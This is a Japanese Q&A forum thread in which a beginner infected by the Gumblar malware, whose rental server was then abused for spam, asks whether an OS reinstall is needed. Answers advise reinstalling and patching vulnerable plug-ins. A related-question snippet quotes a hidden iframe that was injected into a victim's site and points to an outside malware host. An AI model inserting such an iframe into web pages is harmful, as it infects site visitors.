ガンブラーウイルスに感染しました。どうすれば?

このQ&Aのポイント
  • ガンブラーウイルスに感染し、FTPでの不正アクセスがありました。ウイルスソフトをインストールし、駆除しました。
  • 不正アクセスやPCの調子はなく、別のオンラインスキャンも検討中です。
  • ウイルスが検出されなかった場合でもリカバリが必要かどうか不明です。
回答を見る
  • ベストアンサー

ガンブラーウイルスに感染しました。どうすれば?

PC初心者です。 よろしくお願いいたします。 ガンブラーウイルスに感染したようで、 FTPよりレンタルサーバ(さくらネット)に 海外からの不正アクセスがありました。 その後、ウイルスソフト(カスペルスキー)をインストールし、 スキャンした所、木馬のトロイ(ガンブラーのこと?)が発見されました。 もちろんすぐに駆除し、 レンタルサーバのパスワードも変更しました。 その後は2週間ほど一度も不正アクセスはありません。 PCの調子も特に悪くはありません。 しかし、その後不安なので再度カスペルスキーの完全スキャンをしましたが、 結果は何も検出はされませんでした。 ただ他にもノートン、ウイルスバスター、マカフィーなどの オンラインスキャンをこれからやってみます。 そこで質問なのですが、 ここまでしてウイルスが検出されなかった場合、 それでもリカバリ(OSの再インストール?) などしないと危険なのでしょうか? 因みにレンタルサーバには まだホームページなどは設置していません。 ただサーバーにメールソフトを 設置されスパムメールを送られていたみたいです。 以上です。 長い文章で恐縮ですが、 何卒よろしくお願いいたします。

質問者が選んだベストアンサー

  • ベストアンサー
回答No.3

>ここまでしてウイルスが検出されなかった場合、 >それでもリカバリ(OSの再インストール?) >などしないと危険なのでしょうか?  問題のトロイの木馬が完全に除去されていると保証できるなら OS の 再セットアップ等は必要は無いと思いますが、今後設置予定のサイトを 閲覧するであろう第三者に迷惑をかけないためには念のために再セット アップするのがベター、…というより安心でしょう。  未だ何処かに潜んでいれば、変更した FTPサーバー用のパスワードも 未だに盗まれ続けている可能性があるわけですから。  まぁ 3種類ぐらいのオンラインスキャンで何も検出されなかったなら いちおう安全と判断するしかないかも知れません。 >まだホームページなどは設置していません。  それなら、今のうちにガンブラー対策である関連するソフトウェアに 脆弱性が残っていないかを確認して最新バージョンにアップデートする という処置をとっておきましょう。 MyJVN トップページ(MyJVN バージョンチェッカ) http://jvndb.jvn.jp/apis/myjvn/#VCCHECK  既にご存知とは思いますが、特に「Adobe Reader」や「Flash Player」 そして「QuickTime」等のバージョンが古いと、危ないみたいです。 対象ソフトウェア製品(クライアント用) http://jvndb.jvn.jp/apis/myjvn/vcchecklist.html#myjvnapp01

参考URL:
http://www.itmedia.co.jp/enterprise/articles/1009/08/news056.html
toqiyfkx
質問者

お礼

ご丁寧な回答感謝します! やはりカスペル以外のオンラインスキャンでも 特に異常はなかったようです。 しかしおっしゃる通り、 HP閲覧者にご迷惑をおかけしないように 再セットアップしようと思います。 脆弱性の確認も忘れずにします! 今回の出来事でショックを受けたと同時に かなり勉強にもなりました。

その他の回答 (2)

  • imwin7
  • ベストアンサー率47% (24/51)
回答No.2

カスペルスキーを入れたのなら、脆弱性スキャンを行い問題点を修正すれば、 その心配はないと思います。

toqiyfkx
質問者

補足

ご回答ありがとうございます! 脆弱性のスキャンしました。 7つくらい見つかったようですが、 ここから何かしないといけないんですか? 状態:アクティブはありません となっているのですが、 よく意味がわかりません。

回答No.1

>その後、ウイルスソフト(カスペルスキー)をインストールし、 >スキャンした所、木馬のトロイ(ガンブラーのこと?)が発見されました。 こういう記述があるということは、それまでセキュリティソフトはなにもいれていなかったということですか? もしそうであれば、今後のことを考えてリカバリ(OS再インストール)のほうがいいと思います。 もちろん万一ということを考えてのことですが、セキュリティ確保のための手間はいとわないでいただきたいというのが私の考えです。 セキュリティソフトなしでPCを使いHP開設もしようとしていたという、そういうことをした人ができれば再インストールをしないですませたいとお考えなのかもしれませんが、そういうのはいやですね。

toqiyfkx
質問者

お礼

ご回答感謝します! はい、おっしゃるとおりセキュリティソフトを 今まで入れていなかったのです。 ですので、 再インストールはしたいと思います! ありがとうございました!

関連するQ&A

  • トロイのついた名前のウイルスに感染しました><

    ウイルスに感染していますとでたので 今使っているウイルスソフトで感染している物を削除しました。 数日後にまた自動的にソフトが検索を始めまて また同じウイルスがあったので削除しました。 気になったのでカスペルスキーのオンラインスキャンで更にスキャンをするとTrojan-Downloader.JS.Agent.chwというウイルスが検出しました。 使っているソフトでは検出できなかったウイルスなのでどうしたらいいのかわかりません。どなたか削除できる良い方法を教えてください

  • ブログへのウィルス感染について

    ブログへのウィルス感染について ブログへのウィルス感染についてご助言いただきたく、投稿させていただきました。 自分は現在FC2でブログサイトを運営しており、時折数名の方が来訪してくださっています。 ほかの方のブログサイトへもリンクつながりなどで結構訪問させていただいているのですが、最近自分のブログへ行った後にウィルスキャンをすると高い確率で不正クッキーを検出するようになりました; 始めはほかのサイトへも行っているので自分のブログではないと思っていたのですが、先日インターネットに接続後、自分のブログだけに行き、すぐにウィルス検索(PC全体)をしてみたところ、また同じ不正クッキーファイルが検出されてしまいました・・;(この検索をかける前には、一度全体の検索は完了していて、何も検出されていません) 最近良く耳にするガンブラー・ウィルスなどへの感染ではないかと思い、ソースページも確認しましたが、特に文字化けなどの症状は見られませんでした・・ PC自体は最新のウィルス定義ファイルも随時アップデートしていますし、、念のためインターネットに接続した後にはPCの全体検索も行っています。 もし、自分のブログがなんらかのウィルスに感染してしまっているとしたら、どのように対処すればよいのでしょうか? リンクでの友人も増えていて、その方々に迷惑をかけるわけにはいかず、とても困っています・・; ご助言のほどよろしくおねがいいたします・・;

  • ウィルス感染後の処理

    お世話になります。 あるフリーのソフトをインストールした所、ウィルスがその実行ファイルから検出されたのですが、アンインストールすれば大丈夫なのでしょうか?その後、ノートンとウィルスバスターのオンラインスキャンでスキャンしてみた所、検出されませんでしたとでたのですが、どうなのでしょうか? 回答よろしくお願いします。

  • 大至急 助けてください ウイルスに感染しました

    大至急 助けてください ウイルスに感染しました なんか最近おかしいなと思ってウイルスセキュリティで完全スキャンしたら3個ウイルスに感染していました。 しかし、駆除してもぜんぜん改善されないのでシマンテックのオンラインスキャンしたらなんと135ファイル感染していました。 ついでにカスペルスキーもやったら検出数133ファイル検出しました。 ウイルスセキュリティってこんなもんですか? リカ張りしました。

  • トロイの木馬に感染したようです

    昨日、あるサイトで動画のリンクをクリックした時、 ウイルスを取り込んでしまったような感じになりました。 このPCにはマカフィーがインストールされているのですが、 その際いくつかの警告が出ました。 (mikywww exeを実行するとか・・もちろんブロックしました) その後、勝手にhotmailのアドレスあてにメールを複数送ったり しているようです。 それでも、マカフィーのウイルススキャンでは検出されませんでした。 不安なのでカスペルスキーのオンラインスキャンをしてみると、 ・Trojan-Spy.Win32.Bzub.fh ・Worm.Win32.Antinny.az という2つのウイルスに感染しているという結果が出ました。 これらを手動で駆除することは可能なのでしょうか? いろいろなサイトを調べましたが、 これらと同じウイルスの説明がなかなか見つからず、 Trojanのほうだけ海外サイトで ネットバンキングのパスがどうだとか書かれていました。 (翻訳ソフトを使ってなので大雑把にしかわかりません) とても危険なウイルスなのではないかと心配です。 どうすれば駆除できるのでしょうか? どうか、よろしくお願いします。

  • PCが強力なウイルスに感染したら…即OS再インストール??

    PCが確実にウイルス(若しくはスパイウェア等)に感染しているとして、 カスペルスキーなどのアンチウイルスでも検出できないものがあると思いますが、 1ヶ月もしたら検出できなかったものでも定義ファイルがそろって、再びスキャンしたらほぼ完全に感染したものは全て駆除できるんでしょうか? それとも、駆除出来ないものは1ヶ月、いやむしろ半永久的に駆除できず残ってしまうんでしょうか? OS再インストールは、反則として、悪しからず…

  • ブログがウイルスに感染してしまったようです

    3・4日ぶりに自分のブログを見てみたところ、 突然ウイルス対策ソフトがウイルスを検出しました。 投稿した画像データが原因かと思って PCデータをスキャンしたり 該当するであろう記事を非公開にしたりしてみましたが 何も検出されませんでした。 ちなみにブログはjugemで、 検出されたウイルスはトロイの木馬です。 そこで、対処方法をお教え願えませんでしょうか? やはり、閉鎖したほうがいいのでしょうか? わかり辛い説明で申し訳ないのですが、 ご回答、切実にお待ちしております。 なお、 当方、去年ウイルスに感染してしまい 2度再インストールしましたが その後はなんともありませんでした。

  • カスペルスキーについてです

    今カスペルスキーを使っているのですが検出能力などのことを知りたく質問させてもらいます ウイルス検知力が高くファイアウォールも堅いと家電量販店のスタッフに おすすめされたので買ったのですが 調べてみるとそんなに評価が高くないというかフリーのソフトにも検出率が負けていたり 評判もそんなによくなかったりしたので心配になってしまいました 本当のところの評価はどうなのかなと疑問に思っています そこで質問なのですがファイル共有など危ないことはしない普通の使い方をする場合 カスペルスキーを信頼してもいいのでしょうか 他のウイルスソフトと比べウイルス検知能力はどのようなもんなのでしょうか それとガンブラー(GENOウイルスでしったっけ)などのサイトを踏んだだけで感染してしまう ウイルスも検出することが可能なのでしょうか 3つも質問したことがあってあつかましいのですがこの心配を取り除きたいので ぜひ教えていただきたいです  よろしくお願いします

  • トロイの木馬に感染しました。

    ネットの動作が異常に重くなりました。 モデムやLANと言ったネット機器を調べて見ましたが特に異常は見られず、もしや…と思い2台の内1台をPC内にあったウイルススキャンを使用してスキャンしましたが此方にはウイルスは検出されませんでした。 問題はもう一台のPCなのですが、此方にはウイルススキャンのソフトが入っておらずオンラインで使用可能なスキャンソフトでスキャンしました。 するとトロイの木馬が検出され、削除もできた…と表示されましたが、トロイはHDDやメモリに感染し削除したとしても亜種が多く既存のソフトでは削除し切れないという記事を見つけ、リカバリを行うつもりなのです。 そのためバックアップを取ろうと思い、ウイルスの検出された私のアカウントでスキャンを行い感染していない状態のバックアップを取ることが出来ましたが、兄のアカウントでは『ファイルをインストールする権限がありません』と出てしまいスキャンが出来ません。 此処でいくつか質問なのですが ・トロイの木馬はHDDやメモリに感染しますが、マイドキュメントなどのファイルにも感染する可能性はありますか? ・一つのアカウントでスキャンと削除ができればもう一つのアカウントでスキャン等はしなくても平気でしょうか? ・動揺し過ぎて感染したPCをオンラインでスキャンしてしまいましたが他への影響はあるのでしょうか…?; 兄のアカウントについてですが、私のアカウントと同じく『コンピュータの管理者』という設定になっています; 宜しければご回答の程よろしくお願い致します>< ちなみにこれを打っているのは会社のPCです…;

  • サイトが何度も感染

    数日前に自分のサイトがウイルスに感染しました。 サーバからデータを全消去・パソコンを再インストール後、サイトを再アップロード。 そのバックアップは感染の半月以上前にメディアに取ってあった物で、アップロード前にはカスペルスキーでファイルをスキャンしてみましたが何も出ず。 が、数時間後にサイトにアクセスするとまた感染を検出されます。 感染したサイトのインデックスファイルは、毎回bodyタグの後に↓のようなタグが勝手に書き加えられているのですが… <iframe src='http://quickcnt.com/ld/axhst/' width='1' height='1' style='visibility: hidden;'></iframe> 本当は全部半角です。 サイトのデータがファイルスキャンで引っ掛からない何かに感染しているのでしょうか。それとも、他に何か原因があるのでしょうか?

専門家に質問してみよう